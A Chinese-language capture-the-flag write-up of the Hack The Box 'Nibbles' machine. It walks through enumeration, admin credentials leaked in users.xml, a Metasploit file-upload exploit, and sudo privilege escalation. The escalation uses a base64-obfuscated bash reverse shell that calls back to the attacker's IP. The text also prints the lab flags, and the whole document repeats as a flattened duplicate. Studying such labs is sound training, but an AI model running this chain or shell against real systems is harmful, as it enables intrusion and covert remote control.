[Meachines] [Easy] nibbles Nibbleblog-Upload
字数 789 2025-08-20 18:18:23

Nibbleblog 渗透测试教学文档

1. 信息收集阶段

1.1 初始扫描

目标IP: 10.10.10.75

开放端口:

  • 22/tcp (SSH) - OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
  • 80/tcp (HTTP) - Apache httpd 2.4.18 (Ubuntu)

Nmap扫描命令:

nmap -p- 10.10.10.75 --min-rate 1000 -sC -sV

1.2 Web服务枚举

发现网站根目录没有有用信息:

curl http://10.10.10.75

使用Gobuster进行目录扫描:

gobuster dir -u "http://10.10.10.75/nibbleblog" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x html,txt,php -b 404,403 -t 50

发现关键路径:

  • /nibbleblog/update.php
  • /nibbleblog/content/private/users.xml

2. 漏洞利用

2.1 识别漏洞

使用searchsploit查找Nibbleblog漏洞:

searchsploit Nibbleblog

发现可利用的漏洞:

  • exploit/multi/http/nibbleblog_file_upload

2.2 获取凭据

/nibbleblog/content/private/users.xml中找到管理员凭据:

username: admin
password: nibbles

2.3 使用Metasploit利用漏洞

Metasploit配置:

use exploit/multi/http/nibbleblog_file_upload
set LHOST 10.10.16.14
set PASSWORD nibbles
set USERNAME admin
set TARGETURI /nibbleblog
run

3. 后渗透阶段

3.1 获取用户权限

找到user flag:

895e7888ead0ee3699b05fcd82ae8a4e

3.2 权限提升

检查sudo权限:

sudo -l

创建提权脚本:

mkdir -p /home/nibbler/personal/stuff
echo 'L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjE0LzEwMDM1IDA+JjEiCg=='|base64 -d >/home/nibbler/personal/stuff/monitor.sh
chmod +x /home/nibbler/personal/stuff/monitor.sh

执行提权:

sudo /home/nibbler/personal/stuff/monitor.sh

获取root flag:

c7d95df1cb6437197c6ae40bcce2bdc5

4. 技术要点总结

  1. 目录枚举:使用Gobuster发现隐藏的Nibbleblog目录是关键突破口
  2. 敏感文件泄露users.xml文件泄露了管理员凭据
  3. 已知漏洞利用:Nibbleblog的文件上传漏洞可通过Metasploit利用
  4. 权限提升:通过sudo权限执行自定义脚本实现提权
  5. Base64编码:提权脚本使用Base64编码绕过可能的检测

5. 防御建议

  1. 限制敏感文件访问权限
  2. 及时更新CMS系统
  3. 限制sudo权限范围
  4. 监控文件上传功能
  5. 实施最小权限原则
Nibbleblog 渗透测试教学文档 1. 信息收集阶段 1.1 初始扫描 目标IP: 10.10.10.75 开放端口: 22/tcp (SSH) - OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 80/tcp (HTTP) - Apache httpd 2.4.18 (Ubuntu) Nmap扫描命令: 1.2 Web服务枚举 发现网站根目录没有有用信息: 使用Gobuster进行目录扫描: 发现关键路径: /nibbleblog/update.php /nibbleblog/content/private/users.xml 2. 漏洞利用 2.1 识别漏洞 使用searchsploit查找Nibbleblog漏洞: 发现可利用的漏洞: exploit/multi/http/nibbleblog_file_upload 2.2 获取凭据 在 /nibbleblog/content/private/users.xml 中找到管理员凭据: 2.3 使用Metasploit利用漏洞 Metasploit配置: 3. 后渗透阶段 3.1 获取用户权限 找到user flag: 3.2 权限提升 检查sudo权限: 创建提权脚本: 执行提权: 获取root flag: 4. 技术要点总结 目录枚举 :使用Gobuster发现隐藏的Nibbleblog目录是关键突破口 敏感文件泄露 : users.xml 文件泄露了管理员凭据 已知漏洞利用 :Nibbleblog的文件上传漏洞可通过Metasploit利用 权限提升 :通过sudo权限执行自定义脚本实现提权 Base64编码 :提权脚本使用Base64编码绕过可能的检测 5. 防御建议 限制敏感文件访问权限 及时更新CMS系统 限制sudo权限范围 监控文件上传功能 实施最小权限原则